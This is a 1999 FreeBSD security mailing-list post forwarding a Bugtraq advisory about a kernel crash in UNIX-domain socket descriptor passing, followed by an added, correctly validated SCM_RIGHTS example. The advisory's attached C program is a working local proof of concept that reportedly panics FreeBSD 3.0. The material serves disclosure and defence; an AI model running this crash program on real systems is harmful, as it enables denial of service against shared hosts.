From owner-freebsd-security Thu May 6 11:38:15 1999
Delivered-To: freebsd-security@freebsd.org
Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 5FC3E14C48 for ; Thu, 6 May 1999 11:38:04 -0700 (PDT) (envelope-from sthaug@nethelp.no)
Received: (qmail 13869 invoked by uid 1001); 6 May 1999 18:38:00 +0000 (GMT)
To: security@freebsd.org
Subject: Forward: KKIS.05051999.003b
From: sthaug@nethelp.no
X-Mailer: Mew version 1.05+ on Emacs 19.34.2
Date: Thu, 06 May 1999 20:38:00 +0200
Message-ID: <13867.926015880@verdi.nethelp.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from 14 April.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

----- Forwarded message -----

Delivered-To: sthaug@NETHELP.NO
Received: (qmail 13276 invoked from network); 6 May 1999 17:49:49 +0000 (GMT)
Received: from segate.sunet.se (192.36.125.6) by verdi.nethelp.no with SMTP; 6 May 1999 17:49:49 +0000 (GMT)
Received: from segate.sunet.se (192.36.125.16) by SEGATE.SUNET.SE (LSMTP for OpenVMS v1.1a) with SMTP id <10.F91D42BE@SEGATE.SUNET.SE>; Thu, 6 May 1999 18:51:54 +0100
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with spool id 573208 for BUGTRAQ@NETSPACE.ORG; Thu, 6 May 1999 17:44:01 +0000
Approved-By: aleph1@UNDERGROUND.ORG
Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by netspace.org (8.8.7/8.8.7) with ESMTP id FAA21128 for ; Wed, 5 May 1999 05:22:29 -0400
Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by nova.kki.krakow.pl (8.8.7/Ver.2c) with ESMTP id LAA18201 for ; Wed, 5 May 1999 11:26:21 +0200
X-Sender: lluzar@nova.kki.krakow.pl
Date: Wed, 5 May 1999 11:26:21 +0200
Reply-To: Lukasz Luzar
Sender: Bugtraq List
From: Lukasz Luzar
Subject: KKIS.05051999.003b
To: BUGTRAQ@NETSPACE.ORG

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[KKI logo]                  S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  KKI Security Team                     Cracow Commercial Internet
  http://www.security.kki.pl            http://www.kki.pl
  mailto:security@security.kki.pl       mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Report title      : Security problem with sockets in FreeBSD's
                      implementation of UNIX-domain protocol family.
  Problem found by  : Lukasz Luzar (lluzar@security.kki.pl)
  Report created by : Robert Pajak (shadow@security.kki.pl)
                      Lukasz Luzar (lluzar@security.kki.pl)
  Report published  : 5th May 1999
  Report code       : KKIS.05051999.003.b
  Systems affected  : FreeBSD-3.0 and maybe 3.1
  Archive           : http://www.security.kki.pl/advisories/
  Risk level        : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As you know, "The UNIX-domain protocol family is a collection of protocols
that provides local interprocess communication through the normal socket
mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
filesystem pathnames for addressing." SOCK_STREAM sockets also support the
communication of UNIX file descriptors through the use of the functions
sendmsg() and recvmsg().

While testing UNIX-domain protocols, we have found a probable bug in
FreeBSD's implementation of this mechanism. When we ran the attached example
on FreeBSD-3.0 as a local user, the system crashed immediately with the error
"Supervisor read, page not present" in kernel mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

See the attached example.

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Copyright (c) 1999 KKI Security Team, Poland
  All rights reserved.

  All questions please address to mailto:security@security.kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Attachment: example.c (decoded here from the BASE64 attachment; the errno.h
and string.h includes, the int main(void) signature and the comments are
editorial, the program's behaviour is unchanged):

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>

#define PATH "/tmp/123"
#define PATH_TMP "/tmp/123.tmp"
#define SOME_FILE "/etc/passwd"

/* Hand-built control message: a cmsghdr followed directly by one descriptor. */
struct mycmsghdr {
	struct cmsghdr hdr;
	int	fd;
};

void server(void);
void client(void);

int main(void)
{
	switch ( fork()) {
	case -1:
		printf( "fork error %d\n",errno);
		break;
	case 0:
		for (;;) client();	/* child: bind, request, receive, close, repeat */
	default:
		server();		/* parent: answer each request by passing a descriptor */
	}
	return 0;
}

void server(void)
{
	struct sockaddr_un addr;
	struct msghdr mymsghdr;
	struct mycmsghdr ancdbuf;
	char 	data[ 1];
	int	sockfd,
		fd;
	socklen_t len;

	if ( unlink( PATH) == -1)
		printf( "unlink error %d\n",errno);

	if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1)
		printf( "socket error %d\n",errno);

	strcpy( addr.sun_path,PATH);
	addr.sun_len = sizeof( addr.sun_len) + sizeof( addr.sun_family)
			+ strlen( addr.sun_path);
	addr.sun_family = AF_UNIX;

	if ( bind( sockfd,(struct sockaddr *) &addr,addr.sun_len) == -1)
		printf( "bind error %d\n",errno);

	for (;;) {

		if (( fd = open( SOME_FILE,O_RDONLY)) == -1)
			printf( "open file error %d\n",errno);

		len = sizeof( addr.sun_path);

		/* wait for a request datagram; addr is overwritten with the sender's address */
		if ( recvfrom( sockfd,data,sizeof( data),0,
			(struct sockaddr *) &addr,&len) == -1)
			printf( "recvfrom error %d\n",errno);

		ancdbuf.hdr.cmsg_len = sizeof( ancdbuf);
		ancdbuf.hdr.cmsg_level = SOL_SOCKET;
		ancdbuf.hdr.cmsg_type = SCM_RIGHTS;
		ancdbuf.fd = fd;

		mymsghdr.msg_name = (caddr_t) &addr;
		mymsghdr.msg_namelen = len;
		mymsghdr.msg_iov = NULL;
		mymsghdr.msg_iovlen = 0;
		mymsghdr.msg_control = (caddr_t) &ancdbuf;
		mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
		mymsghdr.msg_flags = 0;

		/* pass the descriptor back over the datagram socket, with no data */
		if ( sendmsg( sockfd,&mymsghdr,0) == -1)
			printf( "sendmsg error %d\n",errno);

		close( fd);
	}
}

void client(void)
{
	struct sockaddr_un	addr_s,
				addr_c;
	struct mycmsghdr	ancdbuf;
	struct msghdr		mymsghdr;
	char 	data[ 1];
	int	sockfd,
		len,
		fd;

	if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1)
		printf( "socket error %d\n",errno);

	if ( unlink( PATH_TMP) == -1)
		printf( "unlink error %d\n",errno);

	strcpy( addr_c.sun_path,PATH_TMP);
	addr_c.sun_len = sizeof( addr_c.sun_len) + sizeof(addr_c.sun_family)
			  + strlen( addr_c.sun_path);
	addr_c.sun_family = AF_UNIX;

	strcpy( addr_s.sun_path,PATH);
	addr_s.sun_len = sizeof( addr_s.sun_len) + sizeof(addr_s.sun_family)
		           + strlen( addr_s.sun_path);
	addr_s.sun_family = AF_UNIX;

	if ( bind( sockfd,(struct sockaddr*) &addr_c,addr_c.sun_len) == -1)
		printf( "bind error %d\n",errno);

	/* one-byte request datagram to the server */
	if ( sendto( sockfd,data,sizeof( data),0,(struct sockaddr *) &addr_s,
		addr_s.sun_len) == -1)
		printf( "sendto error %d\n",errno);

	len = addr_s.sun_len;

	ancdbuf.hdr.cmsg_len = sizeof( ancdbuf);
	ancdbuf.hdr.cmsg_level = SOL_SOCKET;
	ancdbuf.hdr.cmsg_type = SCM_RIGHTS;

	mymsghdr.msg_name = NULL;
	mymsghdr.msg_namelen = 0;
	mymsghdr.msg_iov = NULL;
	mymsghdr.msg_iovlen = 0;
	mymsghdr.msg_control = (caddr_t) &ancdbuf;
	mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len;
	mymsghdr.msg_flags = 0;

	/* receive the passed descriptor, then close both it and the socket */
	if ( recvmsg( sockfd,&mymsghdr,0) == -1)
		printf( "recvmsg error %d\n",errno);

	fd = ancdbuf.fd;

	close(fd);
	close( sockfd);
}

----- End of forwarded message -----

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
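The advisory's description refers to descriptor passing with sendmsg()/recvmsg() and SCM_RIGHTS. The following is an added example, not the advisory's example.c and not FreeBSD code: it shows the same mechanism done the portable way, over an AF_UNIX SOCK_STREAM socketpair (so no filesystem path or BSD sun_len field is needed), with the control message laid out by the CMSG_SPACE/CMSG_LEN/CMSG_DATA macros instead of a hand-built header, and with the receiver checking MSG_CTRUNC and the cmsg_level/cmsg_type/cmsg_len triple before it trusts the descriptor it was handed. The function names send_fd, recv_fd, demo_pass_fd and demo_reject_plain_message are this example's own.

```c
/* Added example (not the advisory's code): well-formed SCM_RIGHTS descriptor
 * passing over an AF_UNIX SOCK_STREAM socketpair, using the CMSG_* macros and
 * validating the received control message before trusting the descriptor. */
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Send one descriptor plus a single byte of payload (ancillary data without
 * any regular data is refused by some kernels). Returns 0 on success, -1 on error. */
int send_fd(int sock, int fd_to_send)
{
    char payload = 'F';
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union { struct cmsghdr align; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg;

    memset(&u, 0, sizeof u);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd_to_send, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor. Returns the new fd, or -1 if the message is missing,
 * truncated, or carries no control message of the expected level/type/length.
 * Nothing is read from the buffer unless every check passes. */
int recv_fd(int sock)
{
    char payload;
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union { struct cmsghdr align; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg;
    int fd = -1;

    memset(&u, 0, sizeof u);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    if (msg.msg_flags & MSG_CTRUNC)      /* control data was cut off: do not guess */
        return -1;

    for (struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); cm != NULL; cm = CMSG_NXTHDR(&msg, cm)) {
        if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS
            && cm->cmsg_len == CMSG_LEN(sizeof(int))) {
            memcpy(&fd, CMSG_DATA(cm), sizeof(int));
            return fd;
        }
    }
    return -1;
}

/* Round trip: pass the read end of a pipe across a socketpair and confirm the
 * received descriptor refers to the same open file (same device and inode).
 * Returns 0 on success, a small negative code identifying the failed step. */
int demo_pass_fd(void)
{
    int sv[2], pfd[2], received;
    struct stat a, b;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) return -1;
    if (pipe(pfd) == -1) return -2;
    if (send_fd(sv[0], pfd[0]) == -1) return -3;
    received = recv_fd(sv[1]);
    if (received == -1) return -4;
    if (fstat(pfd[0], &a) == -1 || fstat(received, &b) == -1) return -5;
    int same = (a.st_dev == b.st_dev && a.st_ino == b.st_ino);
    close(received); close(pfd[0]); close(pfd[1]); close(sv[0]); close(sv[1]);
    return same ? 0 : -6;
}

/* Negative case: a message with no SCM_RIGHTS control data must be rejected by
 * recv_fd rather than yielding an uninitialised descriptor. Returns 0 if rejected. */
int demo_reject_plain_message(void)
{
    int sv[2], rc;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) return -1;
    if (send(sv[0], "x", 1, 0) != 1) return -2;
    rc = (recv_fd(sv[1]) == -1) ? 0 : -3;
    close(sv[0]); close(sv[1]);
    return rc;
}

int main(void)
{
    int rc = demo_pass_fd();
    printf("fd passing round trip: %s (rc=%d)\n", rc == 0 ? "ok" : "failed", rc);
    printf("plain message rejected: %s\n", demo_reject_plain_message() == 0 ? "yes" : "no");
    return rc == 0 ? 0 : 1;
}
```

The design point is on the receiving side: the advisory's program reads ancdbuf.fd straight out of a hand-built buffer whether or not recvmsg() delivered anything, so a failed or truncated receive leaves it closing whatever value happened to be in that memory. Walking the CMSG chain and checking level, type and length means a descriptor is only ever taken from a control message the kernel actually filled in.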